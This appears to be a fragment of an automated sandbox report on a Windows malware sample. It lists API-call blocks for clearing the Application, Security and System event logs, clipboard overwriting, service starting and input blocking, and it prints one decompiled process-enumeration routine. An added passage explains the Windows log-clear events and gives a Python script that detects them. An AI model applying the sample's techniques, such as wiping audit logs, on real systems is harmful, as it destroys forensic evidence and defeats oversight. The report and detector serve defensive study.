                                                                                    • CloseEventLog.ADVAPI32(00000000), ref: 04EBA058
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Event$ClearCloseOpen
                                                                                    • String ID: Application$Security$System
                                                                                    • API String ID: 1391105993-2169399579
                                                                                    • Opcode ID: dd468b491e667213e721c6a10641567ad7f7ab629dece82405878bb4e7d6b771
                                                                                    • Instruction ID: b0c1e41880437396bbb77519d8f8af0d5bf7ea304c629e1d0075f5ff14cdf3f8
                                                                                    • Opcode Fuzzy Hash: dd468b491e667213e721c6a10641567ad7f7ab629dece82405878bb4e7d6b771
                                                                                    • Instruction Fuzzy Hash: 27F0F63590020CBBDB01AF59AC89BBFFBB8FBC4601F00015DED0553244CA34AC018B95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
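The block above calls OpenEventLogA / ClearEventLogW / CloseEventLog with the string IDs Application, Security and System, i.e. it wipes all three main logs in one pass. Clearing a log is itself recorded: Windows writes event 1102 (Microsoft-Windows-Eventlog, "The audit log was cleared") into the Security log when that log is cleared, and event 104 (Microsoft-Windows-Eventlog, "The <Channel> log file was cleared") into the System log for the other channels. The script below is an added example of turning that into a detection; it is not part of the report and not the sample's code. The event records are constructed here in a simplified dict form that assumes the fields an EVTX-to-JSON export or Get-WinEvent would give (time, channel, provider, event_id, host, data); the field names are an assumption, not a Windows API. Three different channels cleared on one host inside a short window is the pattern this sample produces and is rated higher than a single clear.

```python
"""Detect event-log clearing from Windows event records.

Added example for this report, not sandbox output or the sample's code.
Records below are constructed test data in an assumed JSON-export shape
(time, channel, provider, event_id, host, data); adjust the field names to
your own pipeline's schema.
"""
from datetime import datetime, timedelta

EVENTLOG_PROVIDER = "Microsoft-Windows-Eventlog"

# Constructed sample records (not from the report). WS01 mirrors what the
# sample's ClearEventLogW sequence would leave behind; WS02 is a lone clear.
SAMPLE_EVENTS = [
    {"time": "2021-10-20T10:00:00", "channel": "System", "provider": EVENTLOG_PROVIDER,
     "event_id": 104, "host": "WS01", "data": {"Channel": "Application", "SubjectUserName": "user"}},
    {"time": "2021-10-20T10:00:00", "channel": "Security", "provider": EVENTLOG_PROVIDER,
     "event_id": 1102, "host": "WS01", "data": {"SubjectUserName": "user"}},
    {"time": "2021-10-20T10:00:01", "channel": "System", "provider": EVENTLOG_PROVIDER,
     "event_id": 104, "host": "WS01", "data": {"Channel": "System", "SubjectUserName": "user"}},
    {"time": "2021-10-20T08:00:00", "channel": "System", "provider": "Service Control Manager",
     "event_id": 7036, "host": "WS01", "data": {}},
    {"time": "2021-10-19T09:00:00", "channel": "System", "provider": EVENTLOG_PROVIDER,
     "event_id": 104, "host": "WS02", "data": {"Channel": "Application", "SubjectUserName": "admin"}},
]


def cleared_channel(ev):
    """Return the name of the log that this record says was cleared, or None."""
    if ev["provider"] != EVENTLOG_PROVIDER:
        return None
    # Clearing the Security log is audited inside Security itself as 1102.
    if ev["channel"] == "Security" and ev["event_id"] == 1102:
        return "Security"
    # Every other channel's clear is logged to System as 104, naming the channel.
    if ev["channel"] == "System" and ev["event_id"] == 104:
        return ev["data"].get("Channel")
    return None


def find_log_clears(events, window_seconds=60):
    """Group clear events per host within a time window and rate them."""
    clears = []
    for ev in events:
        channel = cleared_channel(ev)
        if channel:
            clears.append((ev["host"], datetime.fromisoformat(ev["time"]),
                           channel, ev["data"].get("SubjectUserName")))
    clears.sort(key=lambda c: (c[0], c[1]))

    alerts = []
    i = 0
    while i < len(clears):
        host, first_seen, _, _ = clears[i]
        group = [clears[i]]
        j = i + 1
        # Pull in further clears on the same host that fall inside the window.
        while (j < len(clears) and clears[j][0] == host
               and clears[j][1] - first_seen <= timedelta(seconds=window_seconds)):
            group.append(clears[j])
            j += 1
        channels = sorted({g[2] for g in group})
        # All three main logs wiped together is the wholesale pattern seen in this sample.
        severity = "high" if {"Application", "Security", "System"} <= set(channels) else "medium"
        alerts.append({
            "host": host,
            "first_seen": first_seen.isoformat(),
            "channels": channels,
            "users": sorted({g[3] for g in group if g[3]}),
            "severity": severity,
        })
        i = j
    return alerts


if __name__ == "__main__":
    for alert in find_log_clears(SAMPLE_EVENTS):
        print(alert)
```

Because ClearEventLogW empties the log before the 1102/104 records are written, the clear marker is usually the first record in the affected log; a log whose oldest entry is a 1102 or 104 is the forensic tell even when no live detection was running. Forwarding events to a collector before they can be cleared locally is what makes this detection reliable.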

                                                                                    APIs
                                                                                    • OpenClipboard.USER32(00000000), ref: 04EB74A5
                                                                                    • EmptyClipboard.USER32(?,?,04EB6D7A,?,?), ref: 04EB74B0
                                                                                    • GlobalAlloc.KERNEL32(00000002,?,?,?,04EB6D7A,?,?), ref: 04EB74BB
                                                                                    • GlobalLock.KERNEL32 ref: 04EB74C8
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 04EB74E2
                                                                                    • SetClipboardData.USER32 ref: 04EB74EB
                                                                                    • CloseClipboard.USER32 ref: 04EB74F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 1677084743-0
                                                                                    • Opcode ID: d6ec75f1310cf147f2689d16409409ced0315ae0650a0e28a5b71e3d740ab10a
                                                                                    • Instruction ID: 6d71a55e17520cd9d010bb13648b436509c689f21bec87a50a4bf667506b6a10
                                                                                    • Opcode Fuzzy Hash: d6ec75f1310cf147f2689d16409409ced0315ae0650a0e28a5b71e3d740ab10a
                                                                                    • Instruction Fuzzy Hash: D9F05832601521BBDB122BE2AC0DB8A7F2CEF85793F008011FE4998144DB3ADA00CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04EC372E
                                                                                    • OpenServiceW.ADVAPI32(00000000,?,00000014), ref: 04EC373E
                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 04EC374F
                                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 04EC376B
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04EC377C
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04EC3783
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseHandleOpen$ManagerQueryStartStatus
                                                                                    • String ID:
                                                                                    • API String ID: 2710452061-0
                                                                                    • Opcode ID: 8f35886093b0a26288f9a9a87131d5efb634a41027edb430d3b4182ea2767cdc
                                                                                    • Instruction ID: e2953d4014f3519196db0202b690ec68a4b5aa4d9a18edf687dc642f12613776
                                                                                    • Opcode Fuzzy Hash: 8f35886093b0a26288f9a9a87131d5efb634a41027edb430d3b4182ea2767cdc
                                                                                    • Instruction Fuzzy Hash: 3101D231701204BBD7205A669D88F7BB6BCDF89B52F00002EFD06D2240DE68EC0586A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EBAE50: InitializeSecurityDescriptor.ADVAPI32(04EBB5ED,00000001,74E5F560,74E06490), ref: 04EBAE7F
                                                                                      • Part of subcall function 04EBAE50: AllocateAndInitializeSid.ADVAPI32(04EBB56F,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EBAE9B
                                                                                      • Part of subcall function 04EBAE50: GetLengthSid.ADVAPI32(00000000,74E06620), ref: 04EBAEA9
                                                                                      • Part of subcall function 04EBAE50: GetProcessHeap.KERNEL32(00000008,00000010), ref: 04EBAEB5
                                                                                      • Part of subcall function 04EBAE50: HeapAlloc.KERNEL32(00000000), ref: 04EBAEBC
                                                                                      • Part of subcall function 04EBAE50: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 04EBAECC
                                                                                      • Part of subcall function 04EBAE50: AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,00000000), ref: 04EBAEE1
                                                                                      • Part of subcall function 04EBAE50: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 04EBAEF2
                                                                                      • Part of subcall function 04EBAE50: FreeSid.ADVAPI32(00000000), ref: 04EBAF0B
                                                                                      • Part of subcall function 04EBAE50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04EBAF1B
                                                                                      • Part of subcall function 04EBAE50: HeapFree.KERNEL32(00000000), ref: 04EBAF22
                                                                                    • CreateFileMappingW.KERNEL32(000000FF,0000000C,00000004,00000000,00000D18,_kasssperskdy,04EBB5ED,74E06620), ref: 04EBB58C
                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04EBB5A4
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04EBB5CA
                                                                                    • HeapFree.KERNEL32(00000000), ref: 04EBB5D1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$FreeInitializeProcess$DescriptorFileSecurity$AccessAllocAllocateAllowedCreateDaclLengthMappingView
                                                                                    • String ID: _kasssperskdy
                                                                                    • API String ID: 2879929819-1033421605
                                                                                    • Opcode ID: 97e77fad5432e233fabbfdb75fbbb4eab18214565a489b8d94643cc70ef0f647
                                                                                    • Instruction ID: 732309b2a15a70cc28cc46a6698c8477006eff2195b99f82e233676b2596aab2
                                                                                    • Opcode Fuzzy Hash: 97e77fad5432e233fabbfdb75fbbb4eab18214565a489b8d94643cc70ef0f647
                                                                                    • Instruction Fuzzy Hash: F61182B0E40309AEEB10DFA59C06BEF7BBCEB48705F145115EA41F6280DA75A8008BB6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BlockInput$EventExchangeInterlocked
                                                                                    • String ID:
                                                                                    • API String ID: 2024910948-0
                                                                                    • Opcode ID: ab1720698474fd5fd86831dfe18a76814d1cc38865cc678e510d2adfff4135a8
                                                                                    • Instruction ID: ded6e6b08a47662f5766a29a006478b13137811f5e62089f388ad4721b417fba
                                                                                    • Opcode Fuzzy Hash: ab1720698474fd5fd86831dfe18a76814d1cc38865cc678e510d2adfff4135a8
                                                                                    • Instruction Fuzzy Hash: F521BA772081449FD7009FA6F884E6EFB69FBE42367048267F648C9502C627E535DB74
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • htons.WS2_32(?), ref: 04ECD81E
                                                                                    • bind.WS2_32(?,00000002,0000001C), ref: 04ECD842
                                                                                    • bind.WS2_32(?,?,00000010), ref: 04ECD882
                                                                                    • InterlockedIncrement.KERNEL32(04F06B58), ref: 04ECD8AC
                                                                                    • InterlockedIncrement.KERNEL32(04F06B58), ref: 04ECD8B7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: IncrementInterlockedbind$htons
                                                                                    • String ID:
                                                                                    • API String ID: 1901664375-0
                                                                                    • Opcode ID: 11d61a38bf5bd3d333f534705ff4016c29778c4bf68af9f89f327fddd0691701
                                                                                    • Instruction ID: af08c0dec7f2312ae99135ecdf198421a6d8490c352a402b3e96abfb5b85ae2c
                                                                                    • Opcode Fuzzy Hash: 11d61a38bf5bd3d333f534705ff4016c29778c4bf68af9f89f327fddd0691701
                                                                                    • Instruction Fuzzy Hash: 49319072E00118DBDB14EF68ED41AFEB3A5FF94324F00526AEC1597180DB71AD92DB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: State$Async$Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 1722988271-0
                                                                                    • Opcode ID: 6ab14b8ed99628770cadc1e17ad71cd8d184816cec54782ca02c7c02c9393d36
                                                                                    • Instruction ID: c98bb0a36e5a158520a265c702e739eefb6e1ecf63c247c387a13bcb8264d2c3
                                                                                    • Opcode Fuzzy Hash: 6ab14b8ed99628770cadc1e17ad71cd8d184816cec54782ca02c7c02c9393d36
                                                                                    • Instruction Fuzzy Hash: 88112B72A403109FDA345764CC54FF3B394EF81B89B092418ECDA175D0DB14BD01D6E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,?,00000000), ref: 04EB5844
                                                                                    • FindClose.KERNEL32(00000000,?,00000000), ref: 04EB58AA
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,?,00000000), ref: 04EB58CA
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 04EB58DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseFileFind$CreateFirstHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3283578348-0
                                                                                    • Opcode ID: 779f2d1324e9d0b51d4218a3c5eea3b7a7b704f7df97cb86a5476a5652a6a2af
                                                                                    • Instruction ID: e3fc9962ea1cd7975eb8fb560c807a5b00b3311015e5b3b85541b12c408c49a0
                                                                                    • Opcode Fuzzy Hash: 779f2d1324e9d0b51d4218a3c5eea3b7a7b704f7df97cb86a5476a5652a6a2af
                                                                                    • Instruction Fuzzy Hash: 7731A531E00214FBDB249FA89C497EAB775EB45328F145AA9E8D5A7180D770BD40CBD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$recv
                                                                                    • String ID:
                                                                                    • API String ID: 316788870-0
                                                                                    • Opcode ID: 70bb610363a8535d0413c4c688e07248d541a925796f9d05d94d26bfd62d9df3
                                                                                    • Instruction ID: d297bcd54cbd101d3be65bf6c685cc1bf141f11a93c2c749a2e315415d23b186
                                                                                    • Opcode Fuzzy Hash: 70bb610363a8535d0413c4c688e07248d541a925796f9d05d94d26bfd62d9df3
                                                                                    • Instruction Fuzzy Hash: 1621D671200700CFE7309F6CD589796B7F5EB40329F10993DE546C6A90CBBAF9869B80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EB16B0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,04ED66CE,?,?,04F00654,?,?,?,?,04EB2EDF,?,?), ref: 04EB16B3
                                                                                      • Part of subcall function 04EB16B0: GetLastError.KERNEL32(?,?,?,04EB2EDF,?,?), ref: 04EB16BD
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,04F00654,?,?,?,?,04EB2EDF,?,?), ref: 04ED66D2
                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,04EB2EDF,?,?), ref: 04ED66E1
                                                                                    Strings
                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 04ED66DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                    • API String ID: 450123788-631824599
                                                                                    • Opcode ID: 2228e75d65392fd29407060f04cfc0ba0676c9311d9c6a728ef32093d89e5c5c
                                                                                    • Instruction ID: 7bc6811e2f9f0d94666d35b10c30f5a56ede6ba109db9d19bbdf7d794ab369a8
                                                                                    • Opcode Fuzzy Hash: 2228e75d65392fd29407060f04cfc0ba0676c9311d9c6a728ef32093d89e5c5c
                                                                                    • Instruction Fuzzy Hash: 51E06DB0200740AFE7609F79E814247BBE4AF40358F049D1CD895C2240EBB8F888CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 04EDEA44
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 04EDEA4E
                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 04EDEA5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: e1de71fbde3ab6277719facf060bc93e66b9463d34707e4a174e66397b837c88
                                                                                    • Instruction ID: dadf06175ae048863bf7ab7ad3aaa8dac577d570d05b5f6799c42b02a94bba6b
                                                                                    • Opcode Fuzzy Hash: e1de71fbde3ab6277719facf060bc93e66b9463d34707e4a174e66397b837c88
                                                                                    • Instruction Fuzzy Hash: DD31C77490122DABDB21DF68D88879DBBB8FF48315F5052EAE80CA7250E7749F858F44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,04EDEF85,?,04F00690,0000000C,04EDF0B8,00000000,00000000,00000001,04ED5E8A,04F00530,0000000C,04ED5D33,?), ref: 04EDEFD0
                                                                                    • TerminateProcess.KERNEL32(00000000,?,04EDEF85,?,04F00690,0000000C,04EDF0B8,00000000,00000000,00000001,04ED5E8A,04F00530,0000000C,04ED5D33,?), ref: 04EDEFD7
                                                                                    • ExitProcess.KERNEL32 ref: 04EDEFE9
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: e05fc4b429c1f592bad350dab9c60ac3748c30f42076e9847a63859dd87a5351
                                                                                    • Instruction ID: 39ceed1f8269a3b79c21dbefde23a6fe72d2f03bf039d8730b55d489f3c7e358
                                                                                    • Opcode Fuzzy Hash: e05fc4b429c1f592bad350dab9c60ac3748c30f42076e9847a63859dd87a5351
                                                                                    • Instruction Fuzzy Hash: BCE0B631000608ABDF156F55D908A583FAAEB8468AB005124FD458B121CB3AED92DA40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415882138.0000000004D77000.00000040.00000001.sdmp, Offset: 04D77000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .$L
                                                                                    • API String ID: 0-1125146341
                                                                                    • Opcode ID: d805489d28d633f0ce7dcda1eeac1db81b5e640f075861075353b7ec4d023812
                                                                                    • Instruction ID: 82892334d770ea6a3d17faaf3ab81e9d02f214750292d04d4d68e00e7eaebe9d
                                                                                    • Opcode Fuzzy Hash: d805489d28d633f0ce7dcda1eeac1db81b5e640f075861075353b7ec4d023812
                                                                                    • Instruction Fuzzy Hash: 7C519376E002699FCB10CF98C880AADBBF5FF89704F1545BAD95597311E770B942CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 88%
                                                                                    			E04EC4BC0(void* __ebx, void* __edx, long __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v16;
                                                                                    				char _v532;
                                                                                    				char _v540;
                                                                                    				short _v548;
                                                                                    				char _v1052;
                                                                                    				char _v1060;
                                                                                    				short _v1068;
                                                                                    				char _v1572;
                                                                                    				char _v1580;
                                                                                    				short _v1588;
                                                                                    				char _v2092;
                                                                                    				char _v2100;
                                                                                    				short _v2108;
                                                                                    				char _v2612;
                                                                                    				char _v2620;
                                                                                    				short _v2628;
                                                                                    				intOrPtr _v2636;
                                                                                    				intOrPtr _v2640;
                                                                                    				int _v2644;
                                                                                    				intOrPtr _v2648;
                                                                                    				char _v2652;
                                                                                    				void* _v2656;
                                                                                    				signed int _v2660;
                                                                                    				intOrPtr _v2668;
                                                                                    				char _v2676;
                                                                                    				short _v3200;
                                                                                    				intOrPtr _v3212;
                                                                                    				intOrPtr _v3216;
                                                                                    				long _v3220;
                                                                                    				char _v3224;
                                                                                    				void* _v3228;
                                                                                    				void* _v3232;
                                                                                    				void* _v3236;
                                                                                    				void* _v3244;
                                                                                    				int _v3248;
                                                                                    				long _v3252;
                                                                                    				void* _v3256;
                                                                                    				void* _v3260;
                                                                                    				long _v3264;
                                                                                    				signed int _t135;
                                                                                    				struct tagPROCESSENTRY32W* _t152;
                                                                                    				long _t159;
                                                                                    				_Unknown_base(*)()* _t169;
                                                                                    				void* _t171;
                                                                                    				int _t175;
                                                                                    				int _t177;
                                                                                    				int _t179;
                                                                                    				int _t183;
                                                                                    				int _t185;
                                                                                    				signed int _t207;
                                                                                    				void* _t252;
                                                                                    				void* _t254;
                                                                                    				void* _t256;
                                                                                    				void* _t257;
                                                                                    				void* _t264;
                                                                                    				long _t282;
                                                                                    				long _t283;
                                                                                    				void* _t284;
                                                                                    				void* _t286;
                                                                                    				void* _t288;
                                                                                    				void* _t290;
                                                                                    				void* _t291;
                                                                                    				void* _t292;
                                                                                    				void* _t294;
                                                                                    				void* _t296;
                                                                                    				void* _t297;
                                                                                    				void* _t299;
                                                                                    				void* _t302;
                                                                                    				signed int _t303;
                                                                                    				signed int _t305;
                                                                                    				signed int _t311;
                                                                                    				void* _t314;
                                                                                    				void* _t315;
                                                                                    
                                                                                    				_t272 = __edi;
                                                                                    				_t268 = __edx;
                                                                                    				_t305 = (_t303 & 0xfffffff8) - 0xcac;
                                                                                    				_t135 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t135 ^ _t305;
                                                                                    				_push(__ebx);
                                                                                    				_push(__esi);
                                                                                    				_push(__edi);
                                                                                    				E04EDDAD0(__edi,  &_v3220, 0, 0x22c);
                                                                                    				E04EDDAD0(_t272,  &_v2612, 0, 0x208);
                                                                                    				E04EDDAD0(_t272,  &_v2092, 0, 0x208);
                                                                                    				E04EDDAD0(_t272,  &_v1572, 0, 0x208);
                                                                                    				E04EDDAD0(_t272,  &_v1052, 0, 0x208);
                                                                                    				E04EDDAD0(_t272,  &_v532, 0, 0x208);
                                                                                    				_t311 = _t305 + 0x48;
                                                                                    				_v2640 = 7;
                                                                                    				_v2644 = 0;
                                                                                    				_v2660 = 0;
                                                                                    				_t252 = CreateToolhelp32Snapshot(2, 0);
                                                                                    				_v3228 = _t252;
                                                                                    				if(_t252 != 0xffffffff) {
                                                                                    					_v3224 = 0x22c;
                                                                                    					_t299 = LocalAlloc(0x40, 0x19000);
                                                                                    					_t272 = 1;
                                                                                    					_t152 =  &_v3224;
                                                                                    					_v3248 = _t299;
                                                                                    					 *_t299 = 0x80;
                                                                                    					_v3252 = 1;
                                                                                    					Process32FirstW(_t252, _t152);
                                                                                    					if(_t152 != 0) {
                                                                                    						_t302 = lstrlenW;
                                                                                    						do {
                                                                                    							_t254 = OpenProcess(0x410, 0, _v3220);
                                                                                    							_t159 = _v3220;
                                                                                    							_v3236 = _t254;
                                                                                    							if(_t159 != 0 && _t159 != 4 && _t159 != 8) {
                                                                                    								_push(_t257);
                                                                                    								E04EC4560(_t254, _t254,  &_v2620, _t272, _t302);
                                                                                    								E04EC5D90(_t254,  &_v2620,  &_v1580, _t272, _t302,  &_v1060,  &_v540);
                                                                                    								_t264 = _t254;
                                                                                    								E04EC43E0(_t264,  &_v2100, _t272, _t302);
                                                                                    								_t314 = _t311 + 0xc;
                                                                                    								_v3244 = 0;
                                                                                    								_t169 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                                                    								if(_t169 != 0) {
                                                                                    									_t264 =  &_v3244;
                                                                                    									 *_t169(_t254, _t264);
                                                                                    								}
                                                                                    								_v3248 = 0;
                                                                                    								__imp__ProcessIdToSessionId(_v3220,  &_v3248);
                                                                                    								_t268 = _v3228;
                                                                                    								_push(_t264);
                                                                                    								_t171 = E04EB6060(_t254,  &_v2652, _v3228, _t272, _t302);
                                                                                    								_t315 = _t314 + 4;
                                                                                    								E04EC5330(_t254,  &_v2676, _t171);
                                                                                    								_t173 = _v2636;
                                                                                    								if(_v2636 >= 8) {
                                                                                    									E04EB3540(_t254, _t268, _t272, _v2652, _t173 + 1);
                                                                                    								}
                                                                                    								_t175 = lstrlenW( &_v3200);
                                                                                    								_t177 = lstrlenW( &_v548);
                                                                                    								_t179 = lstrlenW( &_v1068);
                                                                                    								_v3248 = _t175 + _t177 + _t179 + lstrlenW( &_v1588);
                                                                                    								_t183 = lstrlenW( &_v2108);
                                                                                    								_t185 = lstrlenW( &_v2628);
                                                                                    								_t256 = _v3260;
                                                                                    								_t282 = _v3264 + 0x22 + _t185 + _v2660 + _t183 + _v3248 + _t185 + _v2660 + _t183 + _v3248;
                                                                                    								if(LocalSize(_t256) < _t282) {
                                                                                    									_t256 = LocalReAlloc(_t256, _t282, 0x42);
                                                                                    									_v3260 = _t256;
                                                                                    								}
                                                                                    								_t283 = _v3264;
                                                                                    								 *(_t283 + _t256) = _v3228;
                                                                                    								 *((intOrPtr*)(_t283 + _t256 + 4)) = _v3212;
                                                                                    								 *((intOrPtr*)(_t283 + _t256 + 8)) = _v3216;
                                                                                    								_t284 = _t283 + 0xc;
                                                                                    								E04EDDC90(_t284 + _t256,  &_v3200, 2 + lstrlenW( &_v3200) * 2);
                                                                                    								_t286 = _t284 + lstrlenW( &_v3200) * 2 + 2;
                                                                                    								E04EDDC90(_t286 + _t256,  &_v2628, 2 + lstrlenW( &_v2628) * 2);
                                                                                    								_t207 = lstrlenW( &_v2628);
                                                                                    								_t257 =  >=  ? _v2676 :  &_v2676;
                                                                                    								_t288 = _t286 + _t207 * 2 + 2;
                                                                                    								E04EDDC90(_t288 + _t256, _t257, 2 + _v2660 * 2);
                                                                                    								_t290 = _t288 + _v2660 * 2 + 2;
                                                                                    								E04EDDC90(_t290 + _t256,  &_v2108, 2 + lstrlenW( &_v2108) * 2);
                                                                                    								_t291 = _t290 + lstrlenW( &_v2108) * 2;
                                                                                    								 *((intOrPtr*)(_t291 + _t256 + 2)) = _v3256;
                                                                                    								_t292 = _t291 + 6;
                                                                                    								E04EDDC90(_t292 + _t256,  &_v1588, 2 + lstrlenW( &_v1588) * 2);
                                                                                    								_t294 = _t292 + lstrlenW( &_v1588) * 2 + 2;
                                                                                    								E04EDDC90(_t294 + _t256,  &_v1068, 2 + lstrlenW( &_v1068) * 2);
                                                                                    								_t296 = _t294 + lstrlenW( &_v1068) * 2 + 2;
                                                                                    								E04EDDC90(_t296 + _t256,  &_v548, 2 + lstrlenW( &_v548) * 2);
                                                                                    								_t311 = _t315 + 0x54;
                                                                                    								_t297 = _t296 + lstrlenW( &_v548) * 2;
                                                                                    								 *(_t297 + _t256 + 2) = _v3252;
                                                                                    								_t272 = _t297 + 6;
                                                                                    								_t254 = _v3244;
                                                                                    								_v3264 = _t272;
                                                                                    							}
                                                                                    							CloseHandle(_t254);
                                                                                    							_t252 = _v3232;
                                                                                    						} while (Process32NextW(_t252,  &_v3228) != 0);
                                                                                    						_t299 = _v3256;
                                                                                    					}
                                                                                    					LocalReAlloc(_t299, _t272, 0x42);
                                                                                    					CloseHandle(_t252);
                                                                                    				} else {
                                                                                    				}
                                                                                    				_t258 = _v2648;
                                                                                    				if(_v2648 >= 8) {
                                                                                    					E04EB3540(_t252, _t268, _t272, _v2668, _t258 + 1);
                                                                                    				}
                                                                                    				return E04ED572E(_v16 ^ _t311);
                                                                                    			}

                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 04EC4C87
                                                                                    • LocalAlloc.KERNEL32(00000040,00019000), ref: 04EC4CAE
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 04EC4CCC
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,0000022C), ref: 04EC4CEB
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04EC4D70
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC4D77
                                                                                    • ProcessIdToSessionId.KERNEL32(?,?), ref: 04EC4D9A
                                                                                    • lstrlenW.KERNEL32(?,00000000), ref: 04EC4DE7
